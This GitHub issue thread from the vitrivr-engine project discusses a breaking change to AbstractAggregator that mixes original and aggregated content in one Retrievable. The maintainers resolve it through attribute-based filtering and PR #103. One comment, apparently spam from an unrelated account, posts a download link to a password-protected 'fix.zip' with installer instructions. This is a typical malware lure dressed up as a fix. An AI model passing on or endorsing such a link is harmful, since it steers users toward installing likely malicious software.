### ISSUE TITLE
AbstractAggregator: Aggregation operations are no longer transparent downstream

### ISSUE THREAD

**Issue by ppanopticon** [vitrivr/vitrivr-engine#102]
@rahelarnold98 and I just ran into an issue in the XReco context. Due to the recent changes to the `AbstractAggregator`, the "aggregated" `Retrievable` no longer holds only aggregated content. Instead, it holds the original content plus the aggregated content in a single `Retrievable` .

The question now is: By what mechanism can we restrict downstream operators to only work with the aggregated content? It's one thing if an operator is built from scratch. In our case, however, we mostly rely on existing operators that are being configured.

Quite frankly, this change broke our complete video extraction pipeline.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ppanopticon** [comment]
While this may very well be, I currently don't see a way to leverage this in a configurable fashion (i.e., without changing all the operators). Or have I overlooked something?

**Comment by faberf** [comment]
Hey @ppanopticon sorry for just now getting to this. Yes, with the approach we are going with all of the downstream consumers must filter the content using the contentauthorattribute using a configurable value in the extraction configuration. You can check the FES Extractor class for an example.

**Comment by ppanopticon** [comment]
Okay I see - thanks for the hint.

However, I would expect the author(s) of such a breaking change to actually adjust existing operators such that they can work as they did before opening a PR. In its current state, the change breaks the pipeline.

**Comment by faberf** [comment]
Yes, I agree, I actually hadn't considered that this change is breaking before. I will push a fix to dev today, and will edit the wiki.

**Comment by ppanopticon** [comment]
Fixed by PR #103
